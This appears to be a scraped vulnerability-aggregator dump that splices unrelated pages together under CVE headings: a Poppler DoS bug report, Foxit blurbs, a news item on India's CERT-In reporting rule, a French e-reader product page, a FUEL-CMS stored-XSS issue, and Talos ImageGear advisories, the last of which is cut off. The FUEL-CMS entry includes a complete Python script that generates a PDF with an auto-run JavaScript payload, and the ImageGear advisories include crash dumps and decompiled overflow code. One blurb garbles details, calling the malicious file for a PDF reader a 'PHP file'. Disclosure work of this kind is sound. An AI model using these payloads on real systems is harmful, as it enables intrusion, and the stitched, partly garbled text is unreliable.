A logic error in the Hints::Hints function of Poppler v22.03.0 allows attackers to cause a Denial of Service (DoS) via a crafted PDF file.

A logic error in Function Hints::Hints (poppler/Hints.cc) is found with fuzzing.

There is a check after the memory alloc and set the nPages to zero if failed:

    if (!nObjects || !pageObjectNum || !xRefOffset || !pageLength || !pageOffset || !numSharedObject || !sharedObjectId) {
    
        error(errSyntaxWarning, -1, "Failed to allocate memory for hints table");
    
        nPages = 0;
    
    }

But at the end of function, there is a direct call to function readTables WITHOUT the check of nPages.

I believe it should be changed to:

    if (nPages != 0) {
    
        readTables(str, linearization, xref, secHdlr);
    
    }

Otherwise, with the attached poc.pdf, program pdftops will hang for a very long time (days), could be a DoS.

pdftops poc.pdf

Edited Mar 15, 2022 by

CVE-2022-27337: Logic error in function Hints::Hints (#1230) · Issues · poppler / poppler · GitLab

Foxit PDF Reader before 12.0.1 and PDF Editor before 12.0.1 allow a this.maildoc NULL pointer dereference.

CVE-2022-27359

CVE-2022-27337: Logic error in function Hints::Hints (#1230) · Issues · poppler / poppler

Foxit PDF Reader v11.2.1.53537 was discovered to contain a NULL pointer dereference via the component FoxitPDFReader.exe. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted PHP file.

By Jung soo An, Asheer Malhotra and Justin Thattil, with contributions from Aliza Berk and Kendall McKay.

In February 2022, corresponding roughly with the start of the Russian Invasion of Ukraine, Cisco Talos began observing the China-based threat actor Mustang Panda conducting phishing campaigns...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Mustang Panda deploys a new wave of malware targeting Europe

Reporting window is 66 hours shorter than that stipulated under the EU’s GDPR

Reporting window is 66 hours shorter than that stipulated under the EU’s GDPR

Organizations in India face a six-hour data breach reporting deadline, following the introduction of new rules by the country’s computer emergency response team, CERT-In.

The new rules will apply to critical parts of India’s network and IT infrastructure, including service providers, data centers, government organizations, and corporations.

The reporting window is much shorter than those in other large economies: in the EU, the GDPR mandates that breaches are reported within 72 hours. Incidents can be reported by phone, fax or email.

Organizations covered by the rule must keep logs for 180 days after an incident.

**Know your customer**

Some sectors, including data centers, cloud service providers, and VPN operators, will also have to register and maintain certain information about customers, including names, IPs, and their reason for using services, for at least five years.

Similarly, cryptocurrency services will be obliged to maintain ‘know your customer’ (KYC) records.

CERT-In has issued a list of 20 types of incident (PDF) that organizations must report within the six-hour window. These include malware and ransomware attacks; identity theft, spoofing and phishing attacks; and data breaches and data leaks.

Read more of the latest cybersecurity news from India

The list also includes unauthorized access to social media accounts and attacks or suspicious activities affecting cloud computing services, the blockchain, robotics, additive manufacturing, 3D printing, or drones.

All organizations covered by the directive must synchronize their systems to network time (NTP) servers maintained by India’s National Informatics Centre or National Physical Laboratory, or NTP servers synched to those systems, presumably to make it easier for CERT-In to analyze log data.

Organizations that fail to comply may face penalties set out under India’s IT Act, 2000.

Announcing the new rules, India’s Ministry of Electronics and IT stated that “CERT-In has identified certain gaps causing hindrance in incident analysis”, adding that the rules would “enhance overall cyber security posture and ensure safe & trusted Internet in the country”.

RV Raghu, director at Versatilist Consulting India and ISACA Ambassador in India, hailed the announcement as “a great step towards improved data and customer protection which can also strengthen the overall cybersecurity posture of Indian enterprises.

“Reporting incidents can lead to the sharing of information, preventing the rise of systemic risks and leading to a stronger ecosystem,” he told The Daily Swig.

The new rules are due to come into force 60 days after their announcement, on April 28.

RELATED India’s Personal Data Privacy Bill: What does it mean for individuals and businesses?

India to introduce six-hour data breach notification rule

Bookeen Notea Firmware BK_R_1.0.5_20210608 is affected by a directory traversal vulnerability that allows an attacker to obtain sensitive information.

**Comme sur le papier**

La saisie au stylet WACOM rapide et sensible à la pression permet de dessiner avec une grande précision. Initialement **mise au point pour les tablettes graphiques professionnelles,** cette technologie ne nécessite ni fil, ni batterie et autorise une écriture souple et précise. L’affichage instantané sur la surface texturée de l’écran à encre électronique Eink offre une expérience d'écriture identique à celle que l'on a sur papier.

*   **Saisie au stylet**
    
    Technologie Wacom avec 4096 niveaux de pression.
    
*   **Effet papier**
    
    Ecran Eink (16 niveaux de gris) lisible en plein soleil avec une résolution 1404\*1872 de 227dpi
    
*   **Grand écran**
    
    Surface d'affichage de 10,3 pouces (26cm) de diagonale équivalent au format A5
    
*   **Eclairage pour usage de nuit**
    
    Luminosité programmable avec option de réglage de la lumière bleue.
    

**Une saisie ultra-précise pour professionnels**

Initialement mise au point pour les graphistes professionnels, la technologie Wacom autorise une saisie très précise sans interférence avec l'appui de la paume sur l'écran. La Notéa est ainsi compatible avec tous les stylets Wacom et peut gérer jusqu'à 4096 niveaux de pression.

**Un nouvel outil dans votre espace de travail**

La Notéa ajoute des fonctions numériques à votre bloc-notes. Le reconnaissance d'écriture, l'annotation de livres et documents, le partage par email ou sur grand écran.

*   **Transcription des notes**
    
    Conversion automatique des notes manuscrites en texte par MyScript© (33 langues)
    
*   **Annotation de documents**
    
    Prise de notes directement sur documents PDF et EPUB
    
*   **Partage par email**
    
    Envoi et réception directs des notes et documents depuis le bloc-notes numérique.
    
*   **Affichage sur grand écran**
    
    Partage d'écran et diffusion sur téléviseur via Miracast
    

**L'expertise de l'écriture numérique**

La Notéa intègre Myscript©, le plus puissant moteur de reconnaissance d'écriture manuscrite. Les notes qu'elles soient écrites en cursives, en majuscules ou en scriptes, sont converties en quelques secondes vers un fichier Txt ou PDF. Ne laissez plus votre contenu manuscrit à l'écart de votre quotidien dans le monde numérique.

**Autonome et mobile**

Avec son poids plume, prenez votre Notéa partout avec vous. Sa batterie de haute capacité (4000 mAh) vous offrira une autonomie d'une semaine sans recharge. La Notéa possède 32Go de stockage interne et peut également se synchroniser avec différents services de Cloud.

*   **1 semaine d'autonomie**
    
    Batterie Lithium Polymer 4000mAh
    
*   **Mémoire**
    
    32 Go de stockage interne et accès aux différentes services de stockage dans le cloud via les apps.
    
*   **Transfert et partage**
    
    Connexion sans-fil Wifi : IEEE 802.11 b/g/n et Bluetooth : BT 4.2 & BLE.
    
*   **USB-C**
    
    Connecteur USB pour recharge, casque audio, connexion PC
    

**Une tablette à part entière**

La Notéa® peut être considérée comme une tablette tactile Android à part entière proposant un accès à un store d'applications. La Notéa est équipée de deux haut-parleurs et d’un micro.

*   **Interface au doigt**
    
    Ecran tactile capacitif sans interférence avec le stylet
    
*   **Audio**
    
    Haut-parleurs ou écouteurs par USB-C ou Bluetooth pour les applications audio
    
*   **Enregistrement**
    
    Microphone intégré pour les apps nécessitant un enregistrement audio et/ou une prise de son
    
*   **Store d'applications**
    
    Compatible avec le système Android 8.. Accès au Playstore pour télécharger des Apps.
    

*   **Mine texturée**
    
    La mine du stylet spécialement conçue pour procurer un touché très proche de celui de l'écriture sur papier.
    
*   **Gomme**
    
    Bouton latéral qui permet au stylet de basculer en mode gomme et d'effacer par trait ou par zone.
    
*   **Ctrl-z**
    
    Rien n'est irréversible sur la Notéa, bouton latéral d'annulation et de reprise des derniers traits réalisés au stylet.
    
*   **Bluetooth**
    
    Appairage Bluetooth avec la Notéa permettant la personnalisation et l'utilisation de trois boutons latéraux. Fonction Bluetooth rechargeable par USB.
    

**Spécifications techniques**

**Dimensions**

Modèle : CYBN10F

Fonction : Bloc-Notes numérique

Dimensions : 191,1 x 232,5 x 8,0 mm

Poids : 460 g

**Logiciel**

Système d'exploitation : Android 8.1

Play Store : Installable

**Ecran**

Taille : 10,3'' (26cm)

Résolution (Pixels) : 1404\*1872

DPI : 227

Niveaux de gris : 16

Ecran capacitif : oui

Wacom (EMR) : Oui

Front Light (FL) : Oui

Filtre lumière bleue : Oui

**Electronique**

CPU : 1.8 GHz Quad-Core

RAM : 2 Go

Stockage : 32 Go

USB 2.0 : Type C

LED de charge : Blanc

Écouteurs : Type C

Micro : Oui

Haut-parleur : Stéréo

Wi-Fi : IEEE 802.11 b/g/n

Bluetooth : BT 4.2

Bluetooth BLE : Oui

Accéléromètre : Oui

Effet Hall : Oui (Couverture intelligente)

Power button : Power on/off

**Batterie et autonomie**

Type : Lithium-Ion Polymer

Capacité : 3,7 V/4000 mAh

Consommation en veille : 2,0 mA

Durée en veille : 60 jours

**Stylet**

Wacom (EMR) : Oui (4096 niveux de pression)

Bluetooth : 3 boutons : mise en veille, haut, bas

Micro-USB : Recharge batterie pour fonction Bluetooth

**Inscription à la Newsletter**

CVE-2021-45783: Bookeen, la lecture numérique

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 that allows an authenticated user to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.  
1、login as admin .in the Assets page  
  
2、Use the following PoC to generate malicious files :

    # FROM https://github.com/osnr/horrifying-pdf-experiments
    import sys
    
    from pdfrw import PdfWriter
    from pdfrw.objects.pdfname import PdfName
    from pdfrw.objects.pdfstring import PdfString
    from pdfrw.objects.pdfdict import PdfDict
    from pdfrw.objects.pdfarray import PdfArray
    
    def make_js_action(js):
        action = PdfDict()
        action.S = PdfName.JavaScript
        action.JS = js
        return action
     
    def make_field(name, x, y, width, height, r, g, b, value=""):
        annot = PdfDict()
        annot.Type = PdfName.Annot
        annot.Subtype = PdfName.Widget
        annot.FT = PdfName.Tx
        annot.Ff = 2
        annot.Rect = PdfArray([x, y, x + width, y + height])
        annot.MaxLen = 160
        annot.T = PdfString.encode(name)
        annot.V = PdfString.encode(value)
     
        # Default appearance stream: can be arbitrary PDF XObject or
        # something. Very general.
        annot.AP = PdfDict()
     
        ap = annot.AP.N = PdfDict()
        ap.Type = PdfName.XObject
        ap.Subtype = PdfName.Form
        ap.FormType = 1
        ap.BBox = PdfArray([0, 0, width, height])
        ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
        ap.stream = """
    %f %f %f rg
    0.0 0.0 %f %f re f
    """ % (r, g, b, width, height)
    
        # It took me a while to figure this out. See PDF spec:
        # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
    
        # Basically, the appearance stream we just specified doesn't
        # follow the field rect if it gets changed in JS (at least not in
        # Chrome).
    
        # But this simple MK field here, with border/color
        # characteristics, _does_ follow those movements and resizes, so
        # we can get moving colored rectangles this way.
        annot.MK = PdfDict()
        annot.MK.BG = PdfArray([r, g, b])
    
        return annot
    
    def make_page(fields, script):
        page = PdfDict()
        page.Type = PdfName.Page
    
        page.Resources = PdfDict()
        page.Resources.Font = PdfDict()
        page.Resources.Font.F1 = PdfDict()
        page.Resources.Font.F1.Type = PdfName.Font
        page.Resources.Font.F1.Subtype = PdfName.Type1
        page.Resources.Font.F1.BaseFont = PdfName.Helvetica
    
        page.MediaBox = PdfArray([0, 0, 612, 792])
    
        page.Contents = PdfDict()
        page.Contents.stream = """
    BT
    /F1 24 Tf
    ET
        """
    
        annots = fields
    
        page.AA = PdfDict()
        # You probably should just wrap each JS action with a try/catch,
        # because Chrome does no error reporting or even logging otherwise;
        # you just get a silent failure.
        page.AA.O = make_js_action("""
    try {
      %s
    } catch (e) {
      app.alert(e.message);
    }
        """ % (script))
    
        page.Annots = PdfArray(annots)
        return page
    
    if len(sys.argv) > 1:
        js_file = open(sys.argv[1], 'r')
    
        fields = []
        for line in js_file:
            if not line.startswith('/// '): break
            pieces = line.split()
            params = [pieces[1]] + [float(token) for token in pieces[2:]]
            fields.append(make_field(*params))
    
        js_file.seek(0)
    
        out = PdfWriter()
        out.addpage(make_page(fields, js_file.read()))
        out.write('result.pdf')
    

  
3、back to Assets then we can see xss-cookie.svg have been upload:  
  
4、when user click the xss.pdf it will trigger a XSS attack

CVE-2022-28599: A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 · Issue #595 · daylightstudio/FUEL-CMS

A stack-based buffer overflow vulnerability exists in the IGXMPXMLParser::parseDelimiter functionality of Accusoft ImageGear 19.10. A specially-crafted PSD file can overflow a stack buffer, which could either lead to denial of service or, depending on the application, to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in the IGXMPXMLParser::parseDelimiter functionality of Accusoft ImageGear 19.10. A specially-crafted PSD file can overflow a stack buffer, which could either lead to denial of service or, depending on the application, to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Accusoft ImageGear 19.10

**Product URLs**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 Score**

7.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

**CWE**

CWE-193 - Off-by-one Error

**Details**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed PSD file, we end up with the following situation:

    (758.8fc): C++ EH exception - code e06d7363 (first chance)
    ModLoad: 75590000 75610000   C:\Windows\SysWOW64\uxtheme.dll
    
    STATUS_STACK_BUFFER_OVERRUN encountered
    (758.8fc): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=711732c8 ecx=76ae01c0 edx=0018ea2d esi=00000000 edi=000039ac
    eip=76adffa1 esp=0018ec74 ebp=0018ecf0 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    kernel32!UnhandledExceptionFilter+0x5f:
    76adffa1 cc              int     3
    

This kind of error STATUS_STACK_BUFFER_OVERRUN indicates an abnormal program termination. Looking at the call stack may indicate the culprit.

    0:000> kb
    ChildEBP RetAddr  Args to Child              
    0018ecf0 71ace2d9 711732c8 0018ed0c 7110c698 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Talos Vrt Team\ImageGearFuzzing\bin\igCore19d.dll - 
    0018ecfc 7110c698 711732c8 00000001 0018f03c MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0018ed0c 7110c7af 711732c8 029c02d0 029c95e0 igCore19d!IG_GUI_page_title_set+0x3c5e8
    0018f03c 71089a04 029c76bd 029c3f8a 4848482f igCore19d!IG_GUI_page_title_set+0x3c6ff
    0018f150 7108950c 029c0150 0018f1e8 029c0348 igCore19d!IG_mpi_page_set+0x12d9d4
    0018f16c 7108966f 029c765d 000039ac 00000001 igCore19d!IG_mpi_page_set+0x12d4dc
    0018f1b8 7109003d 0018fc54 029c0150 00000000 igCore19d!IG_mpi_page_set+0x12d63f
    0018f670 7104cd0b 0018fc54 1000001e 029c0348 igCore19d!IG_mpi_page_set+0x13400d
    0018f738 7104c242 0018fc54 1000001e 029c0098 igCore19d!IG_mpi_page_set+0xf0cdb
    0018f774 7104bcba 0018fc54 0018f79c 0018f7c4 igCore19d!IG_mpi_page_set+0xf0212
    0018fbcc 70f313d9 0018fc54 029c0060 00000001 igCore19d!IG_mpi_page_set+0xefc8a
    0018fc04 70f708d7 00000000 029c0060 0018fc54 igCore19d!IG_image_savelist_get+0xb29
    0018fe80 70f70239 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0018fea0 70f05757 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x14209
    *** WARNING: Unable to verify checksum for Fuzzme.exe
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for Fuzzme.exe - 
    0018fec0 00402219 00308230 0018fed4 00000001 igCore19d!IG_load_file+0x47
    0018fed8 00402524 00308230 0018ff10 003079a8 Fuzzme!fuzzme+0x19
    0018ff40 0040668d 00000005 003066a8 003079a8 Fuzzme!fuzzme+0x324
    0018ff88 76aa33ca 7efde000 0018ffd4 77d19ed2 Fuzzme!fuzzme+0x448d
    0018ff94 77d19ed2 7efde000 7741e483 00000000 kernel32!BaseThreadInitThunk+0xe
    0018ffd4 77d19ea5 00406715 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
    0018ffec 00000000 00406715 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
    

Investigating the callback stack leads us to the function pointed by igCore19d!IG_mpi_page_set+0x12d9d4, which points to the end to the following pseudo code function at LINE165 pointed by the call to security_check_cookie :

    LINE1   void __thiscall IGXMPXMLParser::FUN_74239720(IGXMPXMLParser *this)
    LINE2   {
    LINE3     char cVar1;
    LINE4     void *pvVar2;
    LINE5     code *pcVar3;
    LINE6     bool bVar4;
    LINE7     int iVar5;
    LINE8     int iVar6;
    LINE9     char *pcVar7;
    LINE10    char *pcVar8;
    LINE11    char *pcVar9;
    LINE12    char *local_10c;
    LINE13    char buffer_ovw [256];
    LINE14    uint stack_canary;
    LINE15    
    LINE16    stack_canary = DAT_7435cea8 ^ (uint)&stack0xfffffffc;
    LINE17    pcVar7 = this->field2_0x8;
    LINE18    pcVar9 = pcVar7 + this->field3_0xc;
    LINE19    bVar4 = false;
    LINE20    this->field10_0x1c = pcVar7;
    LINE21    pcVar8 = pcVar7;
    LINE22    while (pcVar8 < pcVar9) {
    LINE23      cVar1 = *(char *)this->field10_0x1c;
    [...]
    LINE48      else if (cVar1 == '<') {
    [...]
    LINE91                      /* ---------------------------------------------------------------------------
    LINE92                          */
    LINE93        iVar5 = parseDelimiter(this,(char (*) [256])buffer_ovw);
    LINE94                      /* ---------------------------------------------------------------------------
    LINE95                          */
    [...]
    LINE161     this->field10_0x1c = this->field10_0x1c + 1;
    LINE162     pcVar8 = (char *)this->field10_0x1c;
    LINE163   }
    LINE165   security_check_cookie(stack_canary ^ (uint)&stack0xfffffffc);
    LINE166   return;
    LINE167 }
    

So this indicates to us that somehow the stack_canary declared at LINE14, which is initialized LINE16, has been overwritten along the flow of this function. After investigation, it appears the stack_canary is overwritten during the call to the parseDelimiter at LINE93, which takes as a parameter the variable buffer_ovw declared at LINE13 just before the stack_canary.

Below is the parseDelimiter pseudo-code:

    LINE168 void __thiscall IGXMPXMLParser::parseDelimiter(IGXMPXMLParser *this,char (*buffer_ovw) [256])
    LINE169 {
    LINE170   bool bVar1;
    LINE171   int *piVar2;
    LINE172   char (*target_buffer) [256];
    LINE173   int index;
    LINE174   bool bVar3;
    LINE175   int local_410;
    LINE176   int local_40c;
    LINE177   char string_buffer [1024];
    LINE178   uint stack_cookie;
    LINE179   
    LINE180   stack_cookie = DAT_7435cea8 ^ (uint)&stack0xfffffffc;
    LINE181   index = 0;
    LINE182   bVar1 = false;
    LINE183   bVar3 = *(char *)this->field10_0x1c == '/';
    LINE184   if (bVar3) {
    LINE185     (*buffer_ovw)[0] = '/';
    LINE186     this->field10_0x1c = this->field10_0x1c + 1;
    LINE187   }
    LINE188   target_buffer = (char (*) [256])(*buffer_ovw + bVar3);
    LINE189   while (index < 256) {
    LINE190     switch(*(char *)this->field10_0x1c) {
    LINE191     case '\t':
    LINE192     case '\n':
    LINE193     case '\r':
    LINE194     case ' ':
    LINE195     case '/':
    LINE196     case '>':
    LINE197       *(char *)target_buffer = '\0';
    LINE198       this->field10_0x1c = this->field10_0x1c + -1;
    LINE199       bVar1 = true;
    LINE200       break;
    LINE201     default:
    LINE202       *(char *)target_buffer = *(char *)this->field10_0x1c;
    LINE203       target_buffer = (char (*) [256])((int)target_buffer + 1);
    LINE204       index = index + 1;
    LINE205     }
    LINE206     this->field10_0x1c = this->field10_0x1c + 1;
    LINE207     if (bVar1) {
    LINE208       security_check_cookie(stack_cookie ^ (uint)&stack0xfffffffc);
    LINE209       return;
    LINE210     }
    LINE211   }
    LINE212   if (this->field21_0x50 != 0) {
    LINE213     index = this->field31_0x78;
    LINE214     local_40c = this->field10_0x1c - (int)this->field2_0x8;
    LINE215     local_410 = 0;
    LINE216     if (0 < index) {
    LINE217       piVar2 = (int *)this->field30_0x74;
    LINE218       do {
    LINE219         if (local_40c < *piVar2) break;
    LINE220         local_410 = local_410 + 1;
    LINE221         piVar2 = piVar2 + 1;
    LINE222       } while (local_410 < index);
    LINE223     }
    LINE224     if (local_410 < index) {
    LINE225       local_40c = *(int *)((int)this->field30_0x74 + local_410 * 4) - local_40c;
    LINE226     }
    LINE227     else {
    LINE228       local_40c = 0;
    LINE229     }
    LINE230     if (this->field38_0x88 == 2) {
    LINE231       local_40c = local_40c * 2;
    LINE232     }
    LINE233     strncpy(string_buffer,"Tag name exceed max character count",0x400);
    LINE234     (*(code *)this->field21_0x50)
    LINE235               (this,"C:\\BuildAgent\\work\\76e9801d497051a9\\Source\\Common\\Inc_prv\\xmlparser.cpp"
    LINE236                ,0x12f,&local_410);
    LINE237   }
    LINE238   security_check_cookie(stack_cookie ^ (uint)&stack0xfffffffc);
    LINE239   return;
    LINE240 }
    

Looking through the parameter buffer_ovw, we can observe the code is impacting the table in two places: LINE185 and LINE188. In LINE185, we see it depends on the boolean variable bVar3, which is set to true when some specific char is found in LINE183. The side effect of this boolean check isthat it impacts the shift to the start of target_buffer LINE188, as it’s added to buffer_ovw by one byte.  
We observe then a while loop starting LINE189 with a hardcoded constant of 256, which is supposed to prevent the overflow of the destination buffer buffer_ovw.  
But the code is not taking into account the boolean positive result shift and overflows the buffer_ovw if the default case is observed for more than 256 bytes.

The condition to make this happen depends on the PSD file records contained, identified as XMP metadata.  
This leads to a denial-of-service caused by the security_check_cookie. However, depending on how the Imagegear SDK is employed in an application, this could also lead to leaking 1 byte from the canary.

**Crash Information**

    0:000> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    FAULTING_IP: 
    kernel32!UnhandledExceptionFilter+5f
    76adffa1 cc              int     3
    
    EXCEPTION_RECORD:  711ae3e0 -- (.exr 0x711ae3e0)
    ExceptionAddress: 71089a04 (igCore19d!IG_mpi_page_set+0x0012d9d4)
       ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
      ExceptionFlags: 00000001
    NumberParameters: 1
       Parameter[0]: 00000002
    
    CONTEXT:  711ae430 -- (.cxr 0x711ae430;r)
    eax=00000000 ebx=029c0150 ecx=8a712c18 edx=00000100 esi=000000a1 edi=000039ac
    eip=71089a04 esp=0018f044 ebp=0018f150 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igCore19d!IG_mpi_page_set+0x12d9d4:
    71089a04 8be5            mov     esp,ebp
    Last set context:
    eax=00000000 ebx=029c0150 ecx=8a712c18 edx=00000100 esi=000000a1 edi=000039ac
    eip=71089a04 esp=0018f044 ebp=0018f150 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igCore19d!IG_mpi_page_set+0x12d9d4:
    71089a04 8be5            mov     esp,ebp
    Resetting default scope
    
    FAULTING_THREAD:  000008fc
    
    PROCESS_NAME:  Fuzzme.exe
    
    ERROR_CODE: (NTSTATUS) 0x80000003 - {EXCEPTION}  Breakpoint  A breakpoint has been reached.
    
    EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - One or more arguments are invalid
    
    EXCEPTION_PARAMETER1:  00000000
    
    NTGLOBALFLAG:  470
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APP:  fuzzme.exe
    
    ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
    
    BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME
    
    PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN
    
    DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN
    
    LAST_CONTROL_TRANSFER:  from 7108950c to 71089a04
    
    STACK_TEXT:  
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0018f150 7108950c 029c0150 0018f1e8 029c0348 igCore19d!IG_mpi_page_set+0x12d9d4
    0018f16c 7108966f 029c765d 000039ac 00000001 igCore19d!IG_mpi_page_set+0x12d4dc
    0018f1b8 7109003d 0018fc54 029c0150 00000000 igCore19d!IG_mpi_page_set+0x12d63f
    0018f670 7104cd0b 0018fc54 1000001e 029c0348 igCore19d!IG_mpi_page_set+0x13400d
    0018f738 7104c242 0018fc54 1000001e 029c0098 igCore19d!IG_mpi_page_set+0xf0cdb
    0018f774 7104bcba 0018fc54 0018f79c 0018f7c4 igCore19d!IG_mpi_page_set+0xf0212
    0018fbcc 70f313d9 0018fc54 029c0060 00000001 igCore19d!IG_mpi_page_set+0xefc8a
    0018fc04 70f708d7 00000000 029c0060 0018fc54 igCore19d!IG_image_savelist_get+0xb29
    0018fe80 70f70239 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0018fea0 70f05757 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x14209
    0018fec0 00402219 00308230 0018fed4 00000001 igCore19d!IG_load_file+0x47
    0018fed8 00402524 00308230 0018ff10 003079a8 Fuzzme!fuzzme+0x19
    0018ff40 0040668d 00000005 003066a8 003079a8 Fuzzme!fuzzme+0x324
    0018ff88 76aa33ca 7efde000 0018ffd4 77d19ed2 Fuzzme!fuzzme+0x448d
    0018ff94 77d19ed2 7efde000 7741e483 00000000 kernel32!BaseThreadInitThunk+0xe
    0018ffd4 77d19ea5 00406715 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
    0018ffec 00000000 00406715 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
    
    
    FOLLOWUP_IP: 
    igCore19d!IG_mpi_page_set+12d9d4
    71089a04 8be5            mov     esp,ebp
    
    SYMBOL_STACK_INDEX:  0
    
    SYMBOL_NAME:  igcore19d!IG_mpi_page_set+12d9d4
    
    FOLLOWUP_NAME:  MachineOwner
    
    MODULE_NAME: igCore19d
    
    IMAGE_NAME:  igCore19d.dll
    
    DEBUG_FLR_IMAGE_TIMESTAMP:  60aceda9
    
    STACK_COMMAND:  .cxr 0x711ae430 ; kb
    
    FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_80000003_igCore19d.dll!IG_mpi_page_set
    
    BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_MISSING_GSFRAME_igcore19d!IG_mpi_page_set+12d9d4
    
    ANALYSIS_SOURCE:  UM
    
    FAILURE_ID_HASH_STRING:  um:stack_buffer_overrun_80000003_igcore19d.dll!ig_mpi_page_set
    
    FAILURE_ID_HASH:  {e0459bbd-9052-42e3-75ad-df79bbfa6dcb}
    
    Followup: MachineOwner
    ---------
    

**Vendor Response**

ImageGear Pro v20.0 release

Windows: https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe Linux: https://download.accusoft.com/imagegear/pro/unix/ImageGear\_for\_C\_Cpp20.0.0-Linux64.tar.gz

Documentation Windows: http://help.accusoft.com/ImageGear/v20.0/Windows/DLL/webframe.html Linux: http://help.accusoft.com/ImageGear/v20.0/Linux/webframe.html

https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe

**Timeline**

2022-02-07 - Vendor disclosure  
2022-04-29 - Vendor patched  
2022-05-02 - Public Release  

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2022-23400: TALOS-2022-1465 || Cisco Talos Intelligence Group

A memory corruption vulnerability exists in the ioca_mys_rgb_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A memory corruption vulnerability exists in the ioca\_mys\_rgb\_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Accusoft ImageGear 19.10

**Product URLs**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-131 - Incorrect Calculation of Buffer Size

**Details**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed IOCA file, we end up with the following situation:

    (1bf4.175c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8:
    71928758 813abbbbcdab    cmp     dword ptr [edx],0ABCDBBBBh ds:002b:d0d0d0a0=????????
    

When looking at the call stack, we can observe the crash is happening during the free process as detailed below:

    STACK_TEXT:  
    0019f310 71928875     04d71000 d0d0d0c0 00000000 verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8
    0019f334 71928ae0     04d71000 d0d0d0c0 0019f3c4 verifier_71920000!AVrfpDphFindBusyMemory+0x15
    0019f350 7192aad0     04d71000 d0d0d0c0 04d70000 verifier_71920000!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
    0019f36c 7739f966     04d70000 01000002 d0d0d0c0 verifier_71920000!AVrfDebugPageHeapFree+0x90
    0019f3d4 77303d46     d0d0d0c0 3b0d5201 00000000 ntdll_772c0000!RtlDebugFreeHeap+0x3e
    0019f530 7734791d     00000000 d0d0d0c0 d0d0d0c0 ntdll_772c0000!RtlpFreeHeap+0xd6
    0019f58c 77303c16     00000000 00000000 00000000 ntdll_772c0000!RtlpFreeHeapInternal+0x783
    0019f5ac 7146dac2     04d70000 00000000 d0d0d0c0 ntdll_772c0000!RtlFreeHeap+0x46
    0019f5c0 71606b22     d0d0d0c0 00000000 09b60fa8 MSVCR110!free+0x1a
    0019f5d4 715ed0a3     00000000 0bd49ff0 98cbb32c igCore19d!IG_comm_is_comp_exist+0x4ad2
